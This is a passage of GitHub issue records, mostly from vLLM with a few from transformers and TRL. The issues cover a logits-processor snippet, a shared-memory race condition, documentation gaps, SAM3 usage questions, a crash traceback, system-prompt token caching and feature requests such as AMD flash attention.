validate_params(cls, params: SamplingParams):\n target_token: int | None = params.extra_args and params.extra_args.get(\n \"target_token\"\n )\n \n \n if target_token is not None and not isinstance(target_token, int):\n raise ValueError(f\"target_token value {target_token} is not int\")\n\n def __init__(self, vllm_config: \"VllmConfig\", device: torch.device,\n is_pin_memory: bool):\n self.req_info: dict[int, int] = {}\n \n def is_argmax_invariant(self) -> bool:\n \"\"\"Never impacts greedy sampling\"\"\"\n return False\n\n def update_state(self, batch_update: BatchUpdate | None):\n \n if not batch_update:\n return\n # Process added requests.\n for index, params, _, _ in batch_update.added:\n assert params is not None\n self.validate_params(params)\n if params.extra_args and (target_token :=\n params.extra_args.get(\"target_token\")):\n self.req_info[index] = target_token\n else: \n self.req_info.pop(index, None)\n\n if self.req_info:\n # Process removed requests.\n for index in batch_update.removed:\n self.req_info.pop(index, None)\n\n # Process moved requests, unidirectional move (a->b) and swap\n # (a<->b)\n for adx, bdx, direct in batch_update.moved:\n a_val = self.req_info.pop(adx, None)\n b_val = self.req_info.pop(bdx, None)\n if a_val is not None:\n self.req_info[bdx] = a_val\n if direct == MoveDirectionality.SWAP and b_val is not None:\n self.req_info[adx] = b_val\n\n def apply(self, logits: torch.Tensor) -> torch.Tensor:\n if not self.req_info:\n return logits\n # Save target values before modification\n cols = torch.tensor(\n list(self.req_info.values()), dtype=torch.long, device=logits.device\n )\n rows = torch.tensor(\n list(self.req_info.keys()), dtype=torch.long, device=logits.device\n )\n values_to_keep = logits[rows, cols].clone()\n\n # Mask all but target tokens\n logits[rows] = float('-inf')\n logits[rows, cols] = values_to_keep\n\n return logits\n\n```\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29409", "state": "closed", "labels": [ "usage" ], "created_at": "2025-11-25T13:24:17Z", "updated_at": "2025-12-02T10:33:18Z", "comments": 6, "user": "cvadim130" }, { "repo": "vllm-project/vllm", "number": 29389, "title": "[Bug]: race condition in shm_broadcast.py", "body": "### Your current environment\n\n
\nThe output of python collect_env.py\n\n```text\nYour output of `python collect_env.py` here\n```\n\n
\n\n\n### \ud83d\udc1b Describe the bug\n\n# Problem\n`ShmRingBuffer` is a lock-free queue, the implementation of which https://github.com/vllm-project/vllm/blob/12c007e288bf5c0ae3bd438036fbafbad88e706b/vllm/distributed/device_communicators/shm_broadcast.py#L98-L153\n\nrelies on the fact that when a flag is written to, signalling a valid state, the associated data is also in a valid state. To illustrate the point, consider the program\n```python\nshm = shared_memory.SharedMemory(..., size=128)\n# set shm to 0\n\n# process 1\nshm[0] = 1\nshm[64] = 1\n\n# process 2\nwhile shm[64] != 1:\n pass\nprint(shm[0])\n```\n`ShmRingBuffer` requires that `print(shm[0])` always prints `1`. **There is no guarantee this is true**. For this to be true,\n1. The Python language/implementation must provide a memory model, which it doesn't. Loosely speaking, a memory model is a set of guarantees on how source code maps to hardware instructions.\n2. Even if we assume the source code maps \"as intended\" to hardware instructions, the hardware must ensure that process 2 must observe the writes to `shm[0]` and `shm[64]` in the same order as process 1.\n\nAn example of 2 breaking down is given in [`race_condition.cpp`](https://gist.github.com/nvjullin/cc52386e291fe41218b54406ece962a0). On an ARM CPU,\n```bash\n$ g++ -std=c++17 race_condition.cpp\n$ ./a.out\nnumber of violations: 5\n# ...\n```\nUnfortunately, I don't know how to demonstrate the same race condition in Python.\n\n\n# What it means\n`ShmRingBuffer` can have corrupted memory and crashes vLLM sporadically. Such a crash would be near impossible to reproduce and debug.\n\n\n# Solutions\nIn order of recommendation:\n1. Remove `ShmRingBuffer` and always use the fallback `self.local_socket.send(serialized_obj)`. This is the simplest.\n2. Use a well-tested lock-free queue implementation and don't write our own. Lock-free programming is notoriously difficult to write correctly, requires expertise to understand and is overall a maintenence nightmare.\n3. Write it in C++ with proper atomics that guarantees the ordering of writes. The implementation should document extensively the proof of its correctness across different architectures. Python provides no tools for lock-free programming, making it impossible to write.\n\nCC @youkaichao @nvpohanh \n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29389", "state": "open", "labels": [ "bug" ], "created_at": "2025-11-25T09:25:52Z", "updated_at": "2025-11-25T09:25:52Z", "comments": 0, "user": "nvjullin" }, { "repo": "vllm-project/vllm", "number": 29382, "title": "[Doc]: Expert Parallel Deployment says \"Tensor parallel size (always 1 for now)\" is confusing", "body": "### \ud83d\udcda The doc issue\n\nOn page https://docs.vllm.ai/en/latest/serving/expert_parallel_deployment/#single-node-deployment it says Tensor parallel size can only be 1 but didn't mention the behavior of Attention Layers\n\nOn page https://docs.vllm.ai/en/latest/serving/data_parallel_deployment/ it says The expert layers will by default form a (DP x TP) sized tensor parallel group. To enable expert parallelism, include the --enable-expert-parallel CLI arg (on all nodes in the multi-node case).\n\nwhich is rather confusing.\n\n### Suggest a potential alternative/fix\n\nPoint out the correct behavior of MoE models when TP, EP are both set.\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29382", "state": "closed", "labels": [ "documentation" ], "created_at": "2025-11-25T07:54:42Z", "updated_at": "2025-12-13T17:38:01Z", "comments": 0, "user": "xeonliu" }, { "repo": "huggingface/transformers", "number": 42375, "title": "SAM3 single image inference with multiple text prompt", "body": "Hi\nI'm trying to run inference on a single image, aiming to get the bbox of objects from several different categories (e.g. \"a person\" and \"a car\").\nthe only example i found for prompting with multiple categories is in the \"Batched Inference with Text Prompts\" example, but then i need to unnecessarily duplicate my image as the # of categories.\n\nis there a different more efficient way of achieving this? \n\np.s\nwhen i try prompting with a list of several categories and a single image i get an error.\n", "url": "https://github.com/huggingface/transformers/issues/42375", "state": "open", "labels": [], "created_at": "2025-11-25T06:20:09Z", "updated_at": "2026-01-05T16:16:01Z", "comments": 9, "user": "iariav" }, { "repo": "huggingface/trl", "number": 4569, "title": "[doc issue] doc on \"GRPO with replay buffer\" buggy", "body": "### Reproduction\n\nThe code example in [doc for \"GRPO with replay buffer\"](https://huggingface.co/docs/trl/main/en/experimental#grpo-with-replay-buffer) is kind of buggy. \n\n- It imports `GRPOWithReplayBufferTrainer` but never used. \n- It uses `GRPOWithReplayBufferConfig` but never imported\n- The code is apparently not executable.\n\n\nBelow is the code example given in the doc: \n\n```python\nfrom trl.experimental.grpo_with_replay_buffer import GRPOWithReplayBufferTrainer\nfrom datasets import load_dataset\n\ndataset = load_dataset(\"trl-internal-testing/zen\", \"standard_prompt_only\", split=\"train\")\n\n# Guarantee that some rewards have 0 std\ndef custom_reward_func(completions, **kwargs):\n if torch.rand(1).item() < 0.25:\n return [0] * len(completions) # simulate some None rewards\n else:\n return torch.rand(len(completions)).tolist()\n\ntraining_args = GRPOWithReplayBufferConfig(\n output_dir=self.tmp_dir,\n learning_rate=1e-4,\n per_device_train_batch_size=4,\n num_generations=4,\n max_completion_length=8,\n replay_buffer_size=8,\n report_to=\"none\",\n)\ntrainer = GRPOTrainer(\n model=\"trl-internal-testing/tiny-Qwen2ForCausalLM-2.5\",\n reward_funcs=[custom_reward_func],\n args=training_args,\n train_dataset=dataset,\n)\n\nprevious_trainable_params = {n: param.clone() for n, param in trainer.model.named_parameters()}\n\ntrainer.train()\n```\n\n\n### System Info\n\nNA\n\n### Checklist\n\n- [x] I have checked that my issue isn't already filed (see [open issues](https://github.com/huggingface/trl/issues?q=is%3Aissue))\n- [x] I have included my system information\n- [x] Any code provided is minimal, complete, and reproducible ([more on MREs](https://docs.github.com/en/get-started/writing-on-github/working-with-advanced-formatting/creating-and-highlighting-code-blocks))\n- [x] Any code provided is properly formatted in code blocks, (no screenshot, [more on code blocks](https://docs.github.com/en/get-started/writing-on-github/working-with-advanced-formatting/creating-and-highlighting-code-blocks))\n- [x] Any traceback provided is complete", "url": "https://github.com/huggingface/trl/issues/4569", "state": "closed", "labels": [ "\ud83d\udc1b bug", "\ud83d\udcda documentation", "\ud83c\udfcb GRPO" ], "created_at": "2025-11-25T01:30:28Z", "updated_at": "2025-11-25T21:28:00Z", "comments": 2, "user": "DNXie" }, { "repo": "vllm-project/vllm", "number": 29306, "title": "[Usage]: dots.llm.inst is not running due to a type error", "body": "### Your current environment\n\nI'm trying to run dots llm on 4xH100\n\n```\nvllm serve \\\n --uvicorn-log-level=info \\\n rednote-hilab/dots.llm1.inst \\\n --dtype auto \\\n --api-key xxx \\\n --host 0.0.0.0 \\\n --port 8000 \\\n --tensor-parallel-size 4\n --ipc=host \\\n --trust-remote-code\n```\n\nIt failed to run, I got the following crash:\n\n```text\n(EngineCore_DP0 pid=10684) ERROR 11-24 09:41:25 [v1/executor/multiproc_executor.py:230] Worker proc VllmWorker-1 died unexpectedly, shutting down executor.\n(EngineCore_DP0 pid=10684) Process EngineCore_DP0:\n(EngineCore_DP0 pid=10684) Traceback (most recent call last):\n(EngineCore_DP0 pid=10684) File \"/usr/lib/python3.12/multiprocessing/process.py\", line 314, in _bootstrap\n(EngineCore_DP0 pid=10684) self.run()\n(EngineCore_DP0 pid=10684) File \"/usr/lib/python3.12/multiprocessing/process.py\", line 108, in run\n(EngineCore_DP0 pid=10684) self._target(*self._args, **self._kwargs)\n(EngineCore_DP0 pid=10684) File \"/home/ubuntu/venv/lib/python3.12/site-packages/vllm/v1/engine/core.py\", line 846, in run_engine_core\n(EngineCore_DP0 pid=10684) raise e\n(EngineCore_DP0 pid=10684) File \"/home/ubuntu/venv/lib/python3.12/site-packages/vllm/v1/engine/core.py\", line 833, in run_engine_core\n(EngineCore_DP0 pid=10684) engine_core = EngineCoreProc(*args, **kwargs)\n(EngineCore_DP0 pid=10684) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n(EngineCore_DP0 pid=10684) File \"/home/ubuntu/venv/lib/python3.12/site-packages/vllm/v1/engine/core.py\", line 606, in __init__\n(EngineCore_DP0 pid=10684) super().__init__(\n(EngineCore_DP0 pid=10684) File \"/home/ubuntu/venv/lib/python3.12/site-packages/vllm/v1/engine/core.py\", line 109, in __init__\n(EngineCore_DP0 pid=10684) num_gpu_blocks, num_cpu_blocks, kv_cache_config = self._initialize_kv_caches(\n(EngineCore_DP0 pid=10684) ^^^^^^^^^^^^^^^^^^^^^^^^^^^\n(EngineCore_DP0 pid=10684) File \"/home/ubuntu/venv/lib/python3.12/site-packages/vllm/v1/engine/core.py\", line 231, in _initialize_kv_caches\n(EngineCore_DP0 pid=10684) available_gpu_memory = self.model_executor.determine_available_memory()\n(EngineCore_DP0 pid=10684) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n(EngineCore_DP0 pid=10684) File \"/home/ubuntu/venv/lib/python3.12/site-packages/vllm/v1/executor/abstract.py\", line 126, in determine_available_memory\n(EngineCore_DP0 pid=10684) return self.collective_rpc(\"determine_available_memory\")\n(EngineCore_DP0 pid=10684) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n(EngineCore_DP0 pid=10684) File \"/home/ubuntu/venv/lib/python3.12/site-packages/vllm/v1/executor/multiproc_executor.py\", line 358, in collective_rpc\n(EngineCore_DP0 pid=10684) return aggregate(get_response())\n(EngineCore_DP0 pid=10684) ^^^^^^^^^^^^^^\n(EngineCore_DP0 pid=10684) File \"/home/ubuntu/venv/lib/python3.12/site-packages/vllm/v1/executor/multiproc_executor.py\", line 341, in get_response\n(EngineCore_DP0 pid=10684) raise RuntimeError(\n(EngineCore_DP0 pid=10684) RuntimeError: Worker failed with error 'TypeError: can't multiply sequence by non-int of type 'float'\n\n\n(EngineCore_DP0 pid=11385) ERROR 11-24 09:45:27 [v1/engine/core.py:842] EngineCore failed to start.\n(EngineCore_DP0 pid=11385) ERROR 11-24 09:45:27 [v1/engine/core.py:842] Traceback (most recent call last):\n(EngineCore_DP0 pid=11385) ERROR 11-24 09:45:27 [v1/engine/core.py:842] File \"/home/ubuntu/venv/lib/python3.12/site-packages/vllm/v1/engine/core.py\", line 833, in run_engine_core\n(EngineCore_DP0 pid=11385) ERROR 11-24 09:45:27 [v1/engine/core.py:842] engine_core = EngineCoreProc(*args, **kwargs)\n(EngineCore_DP0 pid=11385) ERROR 11-24 09:45:27 [v1/engine/core.py:842] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n(EngineCore_DP0 pid=11385) ERROR 11-24 09:45:27 [v1/engine/core.py:842] File \"/home/ubuntu/venv/lib/python3.12/site-packages/vllm/v1/engine/core.py\", line 606, in __init__\n(EngineCore_DP0 pid=11385) ERROR 11-24 09:45:27 [v1/engine/core.py:842] super().__init__(\n(EngineCore_DP0 pid=11385) ERROR 11-24 09:45:27 [v1/engine/core.py:842] File \"/home/ubuntu/venv/lib/python3.12/site-packages/vllm/v1/engine/core.py\", line 109, in __init__\n(EngineCore_DP0 pid=11385) ERROR 11-24 09:45:27 [v1/engine/core.py:842] num_gpu_blocks, num_cpu_blocks, kv_cache_config = self._initialize_kv_caches(\n(EngineCore_DP0 pid=11385) ERROR 11-24 09:45:27 [v1/engine/core.py:842] ^^^^^^^^^^^^^^^^^^^^^^^^^^^\n(EngineCore_DP0 pid=11385) ERROR 11-24 09:45:27 [v1/engine/core.py:842] File \"/home/ubuntu/venv/lib/python3.12/site-packages/vllm/v1/engine/core.py\", line 231, in _initialize_kv_caches\n(EngineCore_DP0 pid=11385) ERROR 11-24 09:45:27 [v1/engine/core.py:842] available_gpu_memory = self.model_executor.determine_available_memory()\n(EngineCore_DP0 pid=11385) ERROR 11-24 09:45:27 [v1/engine/core.py:842] ", "url": "https://github.com/vllm-project/vllm/issues/29306", "state": "closed", "labels": [ "usage" ], "created_at": "2025-11-24T09:48:08Z", "updated_at": "2025-11-28T23:25:27Z", "comments": 1, "user": "rain-1" }, { "repo": "huggingface/transformers", "number": 42353, "title": "SAM3 point mode is not supported yet?", "body": "In [SAM3 official example](https://github.com/facebookresearch/sam3/blob/main/examples/sam3_for_sam1_task_example.ipynb\n), they also support point mode. But it seems that transforms has not supported yet?\n", "url": "https://github.com/huggingface/transformers/issues/42353", "state": "closed", "labels": [], "created_at": "2025-11-24T07:16:52Z", "updated_at": "2025-11-26T15:16:25Z", "comments": 1, "user": "haofanwang" }, { "repo": "vllm-project/vllm", "number": 29297, "title": "[Bug]: What should the image embedding input be like? I have tested with multiple cases but it all fails", "body": "### Your current environment\n\n```text\n==============================\n System Info\n==============================\nOS : Red Hat Enterprise Linux release 8.10 (Ootpa) (x86_64)\nGCC version : (GCC) 8.5.0 20210514 (Red Hat 8.5.0-26)\nClang version : Could not collect\nCMake version : Could not collect\nLibc version : glibc-2.28\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.10.19 (main, Oct 21 2025, 16:43:05) [GCC 11.2.0] (64-bit runtime)\nPython platform : Linux-4.18.0-553.50.1.el8_10.x86_64-x86_64-with-glibc2.28\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : Could not collect\nCUDA_MODULE_LOADING set to : \nGPU models and configuration : \nGPU 0: NVIDIA A100-SXM4-40GB\nGPU 1: NVIDIA A100-SXM4-40GB\n\nNvidia driver version : 575.51.03\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nByte Order: Little Endian\nCPU(s): 128\nOn-line CPU(s) list: 0-127\nThread(s) per core: 1\nCore(s) per socket: 64\nSocket(s): 2\nNUMA node(s): 8\nVendor ID: AuthenticAMD\nCPU family: 23\nModel: 49\nModel name: AMD EPYC 7742 64-Core Processor\nStepping: 0\nCPU MHz: 2250.000\nCPU max MHz: 2250.0000\nCPU min MHz: 1500.0000\nBogoMIPS: 4491.72\nVirtualization: AMD-V\nL1d cache: 32K\nL1i cache: 32K\nL2 cache: 512K\nL3 cache: 16384K\nNUMA node0 CPU(s): 0-15\nNUMA node1 CPU(s): 16-31\nNUMA node2 CPU(s): 32-47\nNUMA node3 CPU(s): 48-63\nNUMA node4 CPU(s): 64-79\nNUMA node5 CPU(s): 80-95\nNUMA node6 CPU(s): 96-111\nNUMA node7 CPU(s): 112-127\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl nonstop_tsc cpuid extd_apicid aperfmperf pni pclmulqdq monitor ssse3 fma cx16 sse4_1 sse4_2 movbe popcnt aes xsave avx f16c rdrand lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs skinit wdt tce topoext perfctr_core perfctr_nb bpext perfctr_llc mwaitx cpb cat_l3 cdp_l3 hw_pstate ssbd mba ibrs ibpb stibp vmmcall fsgsbase bmi1 avx2 smep bmi2 cqm rdt_a rdseed adx smap clflushopt clwb sha_ni xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local clzero irperf xsaveerptr wbnoinvd arat npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold avic v_vmsave_vmload vgif v_spec_ctrl umip rdpid overflow_recov succor smca sme sev sev_es\n\n==============================\nVersions of relevant libraries\n==============================\n[pip3] flashinfer-python==0.5.2\n[pip3] numpy==2.2.6\n[pip3] nvidia-cublas-cu12==12.8.4.1\n[pip3] nvidia-cuda-cupti-cu12==12.8.90\n[pip3] nvidia-cuda-nvrtc-cu12==12.8.93\n[pip3] nvidia-cuda-runtime-cu12==12.8.90\n[pip3] nvidia-cudnn-cu12==9.10.2.21\n[pip3] nvidia-cudnn-frontend==1.16.0\n[pip3] nvidia-cufft-cu12==11.3.3.83\n[pip3] nvidia-cufile-cu12==1.13.1.3\n[pip3] nvidia-curand-cu12==10.3.9.90\n[pip3] nvidia-cusolver-cu12==11.7.3.90\n[pip3] nvidia-cusparse-cu12==12.5.8.93\n[pip3] nvidia-cusparselt-cu12==0.7.1\n[pip3] nvidia-cutlass-dsl==4.3.0\n[pip3] nvidia-ml-py==13.580.82\n[pip3] nvidia-nccl-cu12==2.27.5\n[pip3] nvidia-nvjitlink-cu12==12.8.93\n[pip3] nvidia-nvshmem-cu12==3.3.20\n[pip3] nvidia-nvtx-cu12==12.8.90\n[pip3] pyzmq==27.1.0\n[pip3] torch==2.9.0\n[pip3] torchaudio==2.9.0\n[pip3] torchvision==0.24.0\n[pip3] transformers==4.57.1\n[pip3] triton==3.5.0\n[conda] flashinfer-python 0.5.2 pypi_0 pypi\n[conda] numpy 2.2.6 pypi_0 pypi\n[conda] nvidia-cublas-cu12 12.8.4.1 pypi_0 pypi\n[conda] nvidia-cuda-cupti-cu12 12.8.90 pypi_0 pypi\n[conda] nvidia-cuda-nvrtc-cu12 12.8.93 pypi_0 pypi\n[conda] nvidia-cuda-runtime-cu12 12.8.90 pypi_0 pypi\n[conda] nvidia-cudnn-cu12 9.10.2.21 pypi_0 pypi\n[conda] nvidia-cudn", "url": "https://github.com/vllm-project/vllm/issues/29297", "state": "closed", "labels": [ "usage" ], "created_at": "2025-11-24T06:02:09Z", "updated_at": "2025-11-26T13:00:17Z", "comments": 2, "user": "DamonZhao-sfu" }, { "repo": "vllm-project/vllm", "number": 29294, "title": "[CPU Backend] [Doc]: Update Installation Docs for Arm CPUs", "body": "### \ud83d\udcda The doc issue\n\nThis page https://docs.vllm.ai/en/stable/getting_started/installation/cpu/#arm-aarch64 is very out-dated.\nWe now release Arm CPU wheels and images thanks to #26931 and #27331\n\nWe need to update that page to reflect that :)\n\n### Suggest a potential alternative/fix\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29294", "state": "closed", "labels": [ "documentation", "cpu" ], "created_at": "2025-11-24T05:33:46Z", "updated_at": "2025-12-15T19:46:26Z", "comments": 5, "user": "fadara01" }, { "repo": "vllm-project/vllm", "number": 29286, "title": "[Performance]: cache system prompt token ids", "body": "### Proposal to improve performance\n\nAs system prompt can be very long now, tokenize the system prompt can be slow. \n\nUsing H20, tokenize 5000 tokens cost about 10ms as below:\n\n![Image](https://github.com/user-attachments/assets/e1b0dafa-6514-47e6-8531-db8eaea32cc7)\n\nSystem prompts are usually fixed and reusable, so cache the system prompt can be profitable.\n\nSpecificly:\n1. In **apply_hf_chat_template** method we can separate the system prompt from other prompts, we can use condition **cache_system_prompt = truncate_prompt_tokens is None and not tokenize and len(conversation) > 1 and conversation[0].get(\"role\") == \"system\"** to judge when we should separate the system prompt.\n2. In **_normalize_prompt_text_to_input** method we judge that whether system prompt is in the dict ({system prompt: token ids}) that we can reuse, then concat system prompt token ids and prompt token ids as the final input_ids.\n\nI am willing to contribute to this opt and looking forward to your suggestions!\n\n### Report of performance regression\n\nThe above cost can be profitable.\n\n### Misc discussion on performance\n\n_No response_\n\n### Your current environment (if you think it is necessary)\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29286", "state": "open", "labels": [ "performance" ], "created_at": "2025-11-24T01:55:32Z", "updated_at": "2025-11-28T08:57:06Z", "comments": 2, "user": "Eviannn" }, { "repo": "vllm-project/vllm", "number": 29281, "title": "[Usage]: Removing last generated token from output and kv cache", "body": "### Your current environment\n\n```text\nvLLM 0.11.2\n```\n\n\n### How would you like to use vllm\n\nHey guys,\n\ni am currently working on a research project where i load a moe-like model and i want to do routing based on the sequence state.\nThe goal is to let expert 0 generate until it reaches the eos token, then remove the eos token and finish generation with expert 1 until the eos token is hit a second time.\nI want to do this to use different strengths of both models.\nMy current approach is to modify GPUModelRunner and Scheduler to remove the eos token from output, reduce num_computed_tokens by 1 and compute a static routing tensor based on the sequence state which i pass as additional model input, to route to expert 0 or 1.\n\nNow i am having some issues with unexpected output, especially with tensor_parallelism>1 on multiple gpus.\n\nI was wondering if there already is a reliable solution to remove the last generated token from output and kv cache, so that the computation leading to eos does not interfere with the second expert.\n\nOr maybe there is even a better way to do this?\n\nThank you!\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29281", "state": "closed", "labels": [ "usage" ], "created_at": "2025-11-23T22:39:16Z", "updated_at": "2025-11-26T09:33:53Z", "comments": 0, "user": "josefdra" }, { "repo": "vllm-project/vllm", "number": 29277, "title": "[Usage]: Creating and accessing per request arguments inside vLLM model", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### How would you like to use vllm\n\nI want to implement token compression techniques on the output embeddings of Qwen-2.5VL which would occur dynamically as the number of requests change. Is there anyway to implement this in vLLM? I see that SamplingParams seem to be the only way to use per request custom arguments but I don\u2019t believe it can be accessed within the model code directly?\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29277", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-23T21:59:31Z", "updated_at": "2025-11-23T21:59:31Z", "comments": 0, "user": "minlu21" }, { "repo": "huggingface/transformers", "number": 42344, "title": "How to fine-tune SAM 3D models?", "body": "### Model description\n\nThe recently released SAM 3D work is truly remarkable. Do you plan to integrate it into Transformers and enable fine-tuning?\nhttps://huggingface.co/facebook/sam-3d-objects\n\n### Open source status\n\n- [x] The model implementation is available\n- [x] The model weights are available\n\n### Provide useful links for the implementation\n\n_No response_", "url": "https://github.com/huggingface/transformers/issues/42344", "state": "open", "labels": [ "New model" ], "created_at": "2025-11-23T17:40:57Z", "updated_at": "2025-11-23T17:40:57Z", "user": "bruno686" }, { "repo": "vllm-project/vllm", "number": 29264, "title": "[Usage]: Monkey Patching SamplingParams", "body": "### Your current environment\n\n```text\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 24.04.3 LTS (x86_64)\nGCC version : (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0\nClang version : Could not collect\nCMake version : version 3.28.3\nLibc version : glibc-2.39\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.13.5 | packaged by conda-forge | (main, Jun 16 2025, 08:27:50) [GCC 13.3.0] (64-bit runtime)\nPython platform : Linux-6.8.0-87-generic-x86_64-with-glibc2.39\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.8.93\nCUDA_MODULE_LOADING set to : \nGPU models and configuration : \nGPU 0: NVIDIA B200\nGPU 1: NVIDIA B200\nGPU 2: NVIDIA B200\nGPU 3: NVIDIA B200\nGPU 4: NVIDIA B200\nGPU 5: NVIDIA B200\nGPU 6: NVIDIA B200\nGPU 7: NVIDIA B200\n\nNvidia driver version : 570.195.03\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 52 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 224\nOn-line CPU(s) list: 0-223\nVendor ID: GenuineIntel\nModel name: INTEL(R) XEON(R) PLATINUM 8570\nCPU family: 6\nModel: 207\nThread(s) per core: 2\nCore(s) per socket: 56\nSocket(s): 2\nStepping: 2\nCPU(s) scaling MHz: 31%\nCPU max MHz: 4000.0000\nCPU min MHz: 800.0000\nBogoMIPS: 4200.00\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf tsc_known_freq pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb cat_l3 cat_l2 cdp_l3 intel_ppin cdp_l2 ssbd mba ibrs ibpb stibp ibrs_enhanced tpr_shadow flexpriority ept vpid ept_ad fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid cqm rdt_a avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb intel_pt avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local split_lock_detect user_shstk avx_vnni avx512_bf16 wbnoinvd dtherm ida arat pln pts hwp hwp_act_window hwp_epp hwp_pkg_req vnmi avx512vbmi umip pku ospke waitpkg avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg tme avx512_vpopcntdq la57 rdpid bus_lock_detect cldemote movdiri movdir64b enqcmd fsrm md_clear serialize tsxldtrk pconfig arch_lbr ibt amx_bf16 avx512_fp16 amx_tile amx_int8 flush_l1d arch_capabilities ibpb_exit_to_user\nVirtualization: VT-x\nL1d cache: 5.3 MiB (112 instances)\nL1i cache: 3.5 MiB (112 instances)\nL2 cache: 224 MiB (112 instances)\nL3 cache: 600 MiB (2 instances)\nNUMA node(s): 2\nNUMA node0 CPU(s): 0-55,112-167\nNUMA node1 CPU(s): 56-111,168-223\nVulnerability Gather data sampling: Not affected\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Reg file data sampling: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec rstack overflow: Not affected\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Enhanced / Automatic IBRS; IBPB conditional; RSB filling; PBRSB-eIBRS SW sequence; BHI", "url": "https://github.com/vllm-project/vllm/issues/29264", "state": "closed", "labels": [ "usage" ], "created_at": "2025-11-23T11:45:54Z", "updated_at": "2025-11-24T13:03:50Z", "comments": 2, "user": "josefdra" }, { "repo": "vllm-project/vllm", "number": 29263, "title": "[Feature]: Enable flash attention (and/or FlashMLA) for AMD GPUs", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nIn [this page from flash-attention](https://github.com/Dao-AILab/flash-attention?tab=readme-ov-file#amd-rocm-support), I checked that the upstream `flash-attention` currently has composable_kernel (for newer AMD GPUs) and WIP triton (for older RNDA GPUs, etc.) implementations. As well as [flash 